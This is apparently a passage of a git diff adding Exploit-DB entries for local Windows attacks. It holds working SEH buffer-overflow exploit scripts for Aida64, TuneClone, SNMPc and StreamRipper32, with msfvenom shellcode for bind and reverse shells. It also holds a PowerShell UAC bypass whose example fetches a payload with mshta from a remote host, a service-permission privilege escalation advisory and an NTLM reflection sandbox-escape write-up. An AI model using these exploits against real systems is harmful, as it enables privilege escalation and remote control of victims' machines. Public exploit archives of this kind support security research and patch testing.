+"\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51"
+"\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71"
+"\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46"
+"\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78"
+"\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30"
+"\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55"
+"\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d"
+"\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b"
+"\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a"
+"\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34"
+"\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33"
+"\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38"
+"\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76"
+"\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66"
+"\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76"
+"\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70"
+"\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56"
+"\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59"
+"\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70"
+"\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47"
+"\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54"
+"\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f"
+"\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b"
+"\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f"
+"\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41")
+
+junk  = shell + ("\x41" * 9479) # 10204
+nseh = "\xEB\x06\x90\x90"
+seh = pack('<I',0x10045f50) # pop pop ret
+nop = "\x90" * 86
+nop2 = "\x90" * 10
+
+egg = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+todo = junk + nseh + seh + nop + egg + nop2
+
+arch = open("load", "wb")
+arch.write(todo)
+arch.close()
+
+print informacion
+print "\nCreated File size " + str(len(todo))
\ No newline at end of file
diff --git a/exploits/windows/local/46988.txt b/exploits/windows/local/46988.txt
new file mode 100644
index 000000000..77c48403e
--- /dev/null
+++ b/exploits/windows/local/46988.txt
@@ -0,0 +1,60 @@
+[Summary]
+The Pronestor service "PNHM" (aka Health Monitoring or HealthMonitor) 
+before 8.1.12.0 has "BUILTIN\Users:(I)(F)" permissions for 
+the "%PROGRAMFILES(X86)%\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe" file, 
+which allows local users to gain privileges via a Trojan horse PronestorHealthMonitor.exe file.
+
+During the installation of Pronestors Outlook-Add-In (version 8.1.11.0 
+and older) the installer creates a service named PNHM (Pronester 
+Health Monitoring) with weak file permission running as SYSTEM.
+The vulnerability allows all "Authenticated Users" to potentially 
+execute arbitrary code as SYSTEM on the local system.
+
+[Additional Information]
+Tested on Windows 7.
+Version: Outlook Add-In 8.1.11.0 and older
+Also tested on version 5.1.6.0 with same result.
+Discovered: 06-nov-2018
+Reported: 07-nov-2018
+
+Vendor: https://www.pronestor.com/
+Vendor confirmed: True
+Fixed: Version 8.1.12.0
+Attack Type: Local Privilege Escalation
+Vulnerability due to: Insecure Permissions
+Discoverer: PovlTekstTV
+CVE: 2018-19113
+Original link: https://gist.github.com/povlteksttv/8f990e11576e1e90e8fb61acf8646d28
+
+[Proof]
+C:\Users\povltekst>sc qc PNHM
+
+SERVICE_NAME: PNHM
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Pronestor HealthMonitor
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\povltekst>icacls 'C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe'
+C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe
+         BUILTIN\Users:(I)(F)
+         NT AUTHORITY\SYSTEM:(I)(F)
+         BUILTIN\Administrators:(I)(F)
+
+Notice: "BUILIN\Users:(I)(F)". (F) = Full access!
+This means that an authenticated user can change the file
+
+[Attack Vectors]
+Replace the file "PronestorHealthMonitor.exe" with a malicious file 
+also called "PronesterHealthMonitor.exe". Next time the service (PNHM) 
+starts, the malicious file will get executed as SYSTEM. The service 
+starts on every reboot.
+
+[Affected Component]
+PronestorHealthMonitor.exe
+This exe will be executed on every reboot by a service named PNHM running as SYSTEM.
\ No newline at end of file
diff --git a/exploits/windows/local/46991.py b/exploits/windows/local/46991.py
new file mode 100755
index 000000000..51e0694a2
--- /dev/null
+++ b/exploits/windows/local/46991.py
@@ -0,0 +1,55 @@
+#!/usr/bin/python
+##########################################################################################################
+# Exploit		:	Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit
+# Author 		:	Nipun Jaswal
+# Tested On		:	Windows 7 Home Basic(x86)
+# Version		: 	6.00.5100
+# Release Date	:	31/May/2019
+# Build			:	21/May/2019
+# Vendor Homepage: https://www.aida64.com/downloads
+# Software Link: https://www.aida64.com/products/aida64-engineer
+# CVE : CVE-2019-
+
+##########################################################################################################
+##################################Steps to Reproduce######################################################
+#1) Open Aida64 Engineer
+#2) Navigate to File-> Preferences
+#3) Logging --> 'Log Sensor Reading to CSV log File'
+#4) Paste the Content from exploit.txt to the 'Log Sensor Reading to CSV log File' field
+#5) Press Apply-> OK
+#6) Exit the Application via File-->Exit
+##########################################//SHELLCODE//###################################################
+# msfvenom -p windows/messagebox TEXT=NIPUN-NIPUN -b '\x00\x0a\x0d' -f py --smallest
+buf =  ""
+buf += "\xb8\xb6\xf7\x5f\x31\xda\xd5\xd9\x74\x24\xf4\x5f\x2b"
+buf += "\xc9\xb1\x42\x31\x47\x14\x83\xef\xfc\x03\x47\x10\x54"
+buf += "\x02\x86\xda\x03\x34\x4d\x39\xc7\xf6\x7c\xf3\x50\xc8"
+buf += "\x49\x90\x15\x5b\x7a\xd2\x5f\x90\xf1\x92\x83\x23\x43"
+buf += "\x53\x30\x4d\x6c\xe8\x70\x8a\x23\xf6\x09\x19\xe2\x07"
+buf += "\x20\x22\xf4\x68\x49\xb1\xd3\x4c\xc6\x0f\x20\x06\x8c"
+buf += "\xa7\x20\x19\xc6\x33\x9a\x01\x9d\x1e\x3b\x33\x4a\x7d"
+buf += "\x0f\x7a\x07\xb6\xfb\x7d\xf9\x86\x04\x4c\xc5\x15\x56"
+buf += "\x2b\x05\x91\xa0\xf5\x4a\x57\xae\x32\xbf\x9c\x8b\xc0"
+buf += "\x1b\x75\x99\xd9\xe8\xdf\x45\x1b\x05\xb9\x0e\x17\x92"
+buf += "\xcd\x4b\x34\x25\x39\xe0\x40\xae\xbc\x1f\xc1\xf4\x9a"
+buf += "\xc3\xb3\x37\x50\xf3\x1a\x63\x1c\xe1\xd4\x49\x77\x64"
+buf += "\xa8\x43\x64\x2a\xdd\xc4\x8b\x34\xe2\x73\x36\xcf\xa6"
+buf += "\xfd\x61\x2d\xab\x86\x8e\x96\x1e\x60\x20\x29\x61\x8f"
+buf += "\xb4\x93\x96\x07\xab\x77\x87\x96\x5b\xbb\xf5\x36\xf8"
+buf += "\xd3\x8c\x35\x65\x56\x5f\x62\xed\xca\xbb\x9e\x67\x14"
+buf += "\x95\x61\x22\xdd\x93\x5f\x9d\x66\x0b\xfd\x53\x25\xcb"
+buf += "\x1d\x48\x07\x3c\x42\x6f\x58\x43\x14\xe0\xdf\xe4\xc4"
+buf += "\x96\x7e\x72\x61\x25\xe9\x31\x0c\xda\x9a\xf8\x15\x94"
+buf += "\x01\xdf\xa3\x2c\x5a\x77\xe3\x7b\xd3\xd0\x6b\xca\xc6"
+buf += "\xae\x22\xba\x56\x66\xe4\x6f\x56\xb1\x8c\xdc\xbc\x4a"
+buf += "\x05\x3d\x8d\x9e\x47\xed\xbf\x4c\x98\xc1\x71\xb1\x36"
+
+##########################################//SHELLCODE//###################################################
+junk= "\x41" * (1106 - len(buf))
+seh = "\x87\xe2\x1d\x01" #0x011de287 - [aida64.exe]
+nseh = "\xeb\xf8\x90\x90"
+buffer = junk + buf +"\xe9\xdd\xfe\xff\xff\xcc" + nseh + seh
+handle = open("exploit.txt","w")
+handle.write(buffer)
+handle.close()
+##########################################//END//#########################################################
\ No newline at end of file
diff --git a/exploits/windows/local/46998.txt b/exploits/windows/local/46998.txt
new file mode 100644
index 000000000..df2c1553d
--- /dev/null
+++ b/exploits/windows/local/46998.txt
@@ -0,0 +1,83 @@
+Interactive Version:
+
+<#
+.SYNOPSIS
+	This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
+.NOTES
+	Function   : SluiHijackBypass
+	File Name  : SluiHijackBypass.ps1
+	Author     : Gushmazuko
+.LINK
+	https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
+	Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
+.EXAMPLE
+	Load "cmd.exe" (By Default used 'arch 64'):
+	SluiHijackBypass -command "cmd.exe" -arch 64
+
+	Load "mshta http://192.168.0.30:4444/0HUGN"
+	SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
+#>
+
+function SluiHijackBypass(){
+	Param (
+
+		[Parameter(Mandatory=$True)]
+		[String]$command,
+		[ValidateSet(64,86)]
+		[int]$arch = 64
+	)
+
+	#Create registry structure
+	New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
+	Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force
+
+	#Perform the bypass
+	switch($arch)
+	{
+		64
+		{
+			#x64 shell in Windows x64 | x86 shell in Windows x86
+			Start-Process "C:\Windows\System32\slui.exe" -Verb runas
+		}
+		86
+		{
+			#x86 shell in Windows x64
+			C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
+		}
+	}
+
+	#Remove registry structure
+	Start-Sleep 3
+	Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
+}
+
+
+################################################################################
+
+
+Non-Interactive Version:
+
+<#
+.SYNOPSIS
+  Noninteractive version of script, for directly execute.
+  This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
+.NOTES
+	File Name  : SluiHijackBypass_direct.ps1
+	Author     : Gushmazuko
+.LINK
+	https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
+	Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
+.EXAMPLE
+	Load "cmd.exe" (By Default used 'arch 64'):
+	powershell -exec bypass .\SluiHijackBypass_direct.ps1
+#>
+
+$program = "cmd.exe"
+New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
+Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force
+#For x64 shell in Windows x64:
+Start-Process "C:\Windows\System32\slui.exe" -Verb runas
+#For x86 shell in Windows x64:
+#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"
+Start-Sleep 3
+Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
\ No newline at end of file
diff --git a/exploits/windows/local/47012.py b/exploits/windows/local/47012.py
new file mode 100755
index 000000000..64971e626
--- /dev/null
+++ b/exploits/windows/local/47012.py
@@ -0,0 +1,65 @@
+# Exploit Title: TuneClone Local Seh Exploit
+# Date: 19.06.2019
+# Vendor Homepage: http://www.tuneclone.com/
+# Software Link:   http://www.tuneclone.com/tuneclone_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 2.20
+# Tested on: Windows XP SP3 EN
+            
+# 1.- Run python code : TuneClone.py
+# 2.- Open EVIL.txt and copy content to Clipboard
+# 3.- Open TuneClone and press Help and 'Enter License Code'
+# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
+# 5.- Click 'OK' and you will have a bind shell port 3110.
+# 6.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+
+import struct
+
+buffer = "\x41" * 1056
+nseh = "\xeb\x06\x90\x90" #jmp short 6
+seh  =  struct.pack('<L',0x583411c0) #msaud32.acm
+nops =  "\x90" * 20
+
+#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
+#badchars "\x00\x0a\x0d"
+shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b" 
+"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
+"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
+"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
+"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
+"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
+"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
+"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
+"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
+"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
+"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
+"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
+"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
+"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
+"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
+"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
+"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
+"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
+"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
+"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
+"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
+"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
+"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
+"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
+"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
+"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
+"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
+"\x77\x03\x31\x3a")
+pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
+payload = buffer + nseh + seh + nops + shellcode + pad
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(payload)
+	f.write(payload)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/47105.py b/exploits/windows/local/47105.py
new file mode 100755
index 000000000..33b60e6ce
--- /dev/null
+++ b/exploits/windows/local/47105.py
@@ -0,0 +1,71 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+#--------------------------------------------------------------------#
+# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #   
+# Date: 11 July 2019                                                 #
+# Exploit Author: @xerubus | mogozobo.com                            #
+# Vendor Homepage: https://www.castlerock.com/                       #
+# Software Linke: https://www.castlerock.com/products/snmpc/         #
+# Version: Enterprise Editioin 9 & 10                                #
+# Tested on:  Windows 7                                              # 
+# CVE-ID: CVE-2019-13494                                             #
+# Full write-up: https://www.mogozobo.com/?p=3534                    #
+#--------------------------------------------------------------------#
+import sys, os  
+os.system('clear')
+
+print("""\
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/  -= SNMPc_Mapping_BOF by @xerubus =-    
+|   D _]/\ \  -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+                    """)
+
+filename="evilmap.csv"
+junk = "A" * 2064    
+nseh = "\xeb\x07\x90\x90"      # short jmp to 0018f58d  \xeb\x07\x90\x90
+seh = "\x05\x3c\x0e\x10"       # 0x100e3c05 ; pop esi # pop edi # ret (C:\program files (x86)\snmpc network manager\CRDBAPI.dll)
+
+# Pre-padding of mapping file.  Note mandatory trailing character return.
+pre_padding = ( 
+"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
+"\"Root Subnet\",\"Subnet\",\"\",\"\",\"\",\"2\",\"000=Unknown\",\"\",\"auto.ico\",\"\",\"2\",\"Square\",\"(NULL)\",\"(0,0)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"0\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n"
+"\"")
+
+# Post-padding of mapping file.  Note mandatory trailing character return.
+post_padding = ( 
+"\",\"Device\",\"127.0.0.1\",\"1.3.6.1.4.1.29671.2.107\",\"\",\"3\",\"000=Unknown\",\"000=Unknown\",\"auto.ico\",\"\",\"2\",\"Square\",\"Root Subnet(2)\",\"(-16,-64)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"=\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n")
+
+# msfvenom —platform windows -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f c
+shellcode = (
+"\xda\xcc\xd9\x74\x24\xf4\xba\xd9\xa1\x94\x48\x5f\x2b\xc9\xb1"
+"\x31\x31\x57\x18\x83\xc7\x04\x03\x57\xcd\x43\x61\xb4\x05\x01"
+"\x8a\x45\xd5\x66\x02\xa0\xe4\xa6\x70\xa0\x56\x17\xf2\xe4\x5a"
+"\xdc\x56\x1d\xe9\x90\x7e\x12\x5a\x1e\x59\x1d\x5b\x33\x99\x3c"
+"\xdf\x4e\xce\x9e\xde\x80\x03\xde\x27\xfc\xee\xb2\xf0\x8a\x5d"
+"\x23\x75\xc6\x5d\xc8\xc5\xc6\xe5\x2d\x9d\xe9\xc4\xe3\x96\xb3"
+"\xc6\x02\x7b\xc8\x4e\x1d\x98\xf5\x19\x96\x6a\x81\x9b\x7e\xa3"
+"\x6a\x37\xbf\x0c\x99\x49\x87\xaa\x42\x3c\xf1\xc9\xff\x47\xc6"
+"\xb0\xdb\xc2\xdd\x12\xaf\x75\x3a\xa3\x7c\xe3\xc9\xaf\xc9\x67"
+"\x95\xb3\xcc\xa4\xad\xcf\x45\x4b\x62\x46\x1d\x68\xa6\x03\xc5"
+"\x11\xff\xe9\xa8\x2e\x1f\x52\x14\x8b\x6b\x7e\x41\xa6\x31\x14"
+"\x94\x34\x4c\x5a\x96\x46\x4f\xca\xff\x77\xc4\x85\x78\x88\x0f"
+"\xe2\x77\xc2\x12\x42\x10\x8b\xc6\xd7\x7d\x2c\x3d\x1b\x78\xaf"
+"\xb4\xe3\x7f\xaf\xbc\xe6\xc4\x77\x2c\x9a\x55\x12\x52\x09\x55"
+"\x37\x31\xcc\xc5\xdb\x98\x6b\x6e\x79\xe5")
+
+
+print "[+] Building payload.."
+payload = "\x90" * 10 + shellcode
+print "[+] Creating buffer.."
+buffer = pre_padding + junk + nseh + seh + payload + "\x90" * 10 + post_padding
+print "[+] Writing evil mapping file.."
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
+print "[+] Done.  Import evilmap.csv into SNMPc and A Wild Calc Appears!\n\n"
\ No newline at end of file
diff --git a/exploits/windows/local/47115.txt b/exploits/windows/local/47115.txt
new file mode 100644
index 000000000..b1cbe455d
--- /dev/null
+++ b/exploits/windows/local/47115.txt
@@ -0,0 +1,64 @@
+VULNERABILITY DETAILS
+It's possible to use the NTLM reflection attack to escape a browser sandbox in the case where the
+sandboxed process is allowed to create TCP sockets. In particular, I was able to combine the issues
+mentioned below with a bug in Chromium to escape its sandbox.
+
+## HTTP -> SMB NTLM reflection
+This is a long known attack that was described, for example, in
+https://bugs.chromium.org/p/project-zero/issues/detail?id=222. As far as I can tell, MS16-075 was
+supposed to to fix it by blocking attempts to reflect NTLM authentication operating in the same
+machine mode (not sure about the actual internal term for that). However, it's still possible to
+reflect NTLM authentication that works in the regular remote mode, and an attacker can force the
+parties to use the remote mode, for example, by clearing the NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED
+flag in the initial NEGOTIATE_MESSAGE message.
+
+In the actual exploit, a compromised sandboxed process acts as both a web server and an SMB client,
+and asks the browser to visit http://localhost:[fake_webserver_port]. The browser receives an NTLM
+authentication request and considers the `localhost` domain to be safe to automatically log on with
+the current user's credentials. The sandboxed process forwards the corresponding packets to the
+local SMB server.
+
+The problem here is that since the established session is considered remotely authenticated, it's
+not allowed to access administrative shares unless the browser process runs at the high integrity
+level. Therefore, another bug is required to gain file system access.
+
+## Insufficient path check in EFSRPC
+The Encrypting File System Remote Protocol is a Remote Procedure Call interface that is used to
+manage data objects stored in an encrypted form. It supports backing up and restoring files over
+SMB, among other things. Functions like `EfsRpcOpenFileRaw` implement security checks, i.e., they
+forbid remote users to pass regular file paths. However, if the attacker passes a UNC path of the
+form `\\localhost\C$\...`, `lsass.exe` will initiate a new SMB connection while impersonating the
+calling user, but this time using the same machine mode authentication; therefore it will be
+permitted to access the C$ share.
+
+The exploit saves the payload on the user's disk (the easiest way might be just to force it to be
+auto-downloaded as a .txt file) and calls the EFSRPC methods to copy it as an .exe file to the
+user's Startup folder.
+
+There's also another path check bypass that has been found by James Forshaw. `EfsRpcOpenFileRaw`
+accepts file paths starting with `\\.\C:\...`, presumably thinking that it's a UNC path since it
+starts with two back-slashes. Please note that this variant also works in the case where a regular
+user's credentials are relayed to another machine in a domain, so it might have wider security
+implications.
+
+It's also worth mentioning that the `efsrpc` named pipe might not be enabled by default, but the
+same RPC endpoint is available on the `lsass` named pipe with UUID
+[c681d488-d850-11d0-8c52-00c04fd90f7e].
+
+REPRODUCTION CASE
+The proof-of-concept is based on [impacket](https://github.com/SecureAuthCorp/impacket/). It's a
+collection of Python classes that supports working with SMB and MSRPC.
+1. Run `start.cmd`, which downloads impacket from Github, applies the patch, and starts the server.
+2. Open http://localhost/ in a Chromium-based browser.
+3. You should see a new .exe file appearing on your desktop.
+
+VERSION
+Microsoft Windows [Version 10.0.17134.648]
+
+REFERENCES
+https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4
+https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47115.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47116.py b/exploits/windows/local/47116.py
new file mode 100755
index 000000000..f6cb7aba3
--- /dev/null
+++ b/exploits/windows/local/47116.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+
+#Exploit Title: StreamRipper32 Buffer Overflow
+#Date: 07/2019
+#Exploit Author: Andrey Stoykov (OSCP)
+#Tested On: Win7 SP1 x64
+#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
+#Version: 2.6
+#Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern"
+
+file = open('exploit.txt', 'wb')
+
+#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6  EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe" -f c
+
+shellcode = ("\xdb\xd7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" +
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +
+"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" +
+"\x4a\x49\x39\x6c\x48\x68\x4b\x39\x53\x30\x65\x50\x63\x30" +
+"\x45\x30\x4f\x79\x6b\x55\x64\x71\x4b\x62\x42\x44\x4e\x6b" +
+"\x50\x52\x44\x70\x4e\x6b\x61\x42\x76\x6c\x4e\x6b\x61\x42" +
+"\x52\x34\x6c\x4b\x54\x32\x46\x48\x56\x6f\x6e\x57\x70\x4a" +
+"\x37\x56\x35\x61\x79\x6f\x56\x51\x4f\x30\x4c\x6c\x57\x4c" +
+"\x31\x71\x71\x6c\x46\x62\x46\x4c\x77\x50\x6f\x31\x38\x4f" +
+"\x66\x6d\x73\x31\x6b\x77\x79\x72\x78\x70\x66\x32\x33\x67" +
+"\x6e\x6b\x43\x62\x34\x50\x4c\x4b\x43\x72\x75\x6c\x57\x71" +
+"\x5a\x70\x6c\x4b\x61\x50\x30\x78\x6f\x75\x39\x50\x32\x54" +
+"\x63\x7a\x36\x61\x4a\x70\x36\x30\x4c\x4b\x51\x58\x34\x58" +
+"\x4c\x4b\x76\x38\x75\x70\x53\x31\x5a\x73\x79\x73\x35\x6c" +
+"\x32\x69\x6e\x6b\x66\x54\x4e\x6b\x56\x61\x49\x46\x35\x61" +
+"\x49\x6f\x74\x71\x6b\x70\x4c\x6c\x49\x51\x7a\x6f\x64\x4d" +
+"\x55\x51\x79\x57\x54\x78\x49\x70\x32\x55\x58\x74\x44\x43" +
+"\x73\x4d\x4b\x48\x55\x6b\x33\x4d\x76\x44\x33\x45\x6b\x52" +
+"\x66\x38\x6c\x4b\x53\x68\x44\x64\x35\x51\x38\x53\x73\x56" +
+"\x4c\x4b\x54\x4c\x70\x4b\x4c\x4b\x32\x78\x77\x6c\x35\x51" +
+"\x5a\x73\x6e\x6b\x65\x54\x4c\x4b\x76\x61\x7a\x70\x4e\x69" +
+"\x30\x44\x44\x64\x61\x34\x71\x4b\x73\x6b\x53\x51\x61\x49" +
+"\x62\x7a\x42\x71\x4b\x4f\x59\x70\x52\x78\x53\x6f\x62\x7a" +
+"\x6c\x4b\x57\x62\x4a\x4b\x4f\x76\x73\x6d\x51\x78\x74\x73" +
+"\x36\x52\x37\x70\x45\x50\x52\x48\x64\x37\x31\x63\x35\x62" +
+"\x33\x6f\x33\x64\x43\x58\x62\x6c\x33\x47\x36\x46\x37\x77" +
+"\x39\x6f\x7a\x75\x6f\x48\x6e\x70\x73\x31\x35\x50\x53\x30" +
+"\x45\x79\x68\x44\x43\x64\x46\x30\x32\x48\x56\x49\x6d\x50" +
+"\x72\x4b\x33\x30\x39\x6f\x39\x45\x50\x50\x52\x70\x76\x30" +
+"\x36\x30\x67\x30\x46\x30\x53\x70\x72\x70\x51\x78\x49\x7a" +
+"\x56\x6f\x39\x4f\x49\x70\x69\x6f\x78\x55\x6b\x39\x6b\x77" +
+"\x62\x48\x49\x50\x6f\x58\x54\x78\x53\x36\x50\x68\x73\x32" +
+"\x45\x50\x66\x71\x31\x4c\x4d\x59\x79\x76\x42\x4a\x64\x50" +
+"\x72\x76\x62\x77\x65\x38\x6e\x79\x6e\x45\x42\x54\x73\x51" +
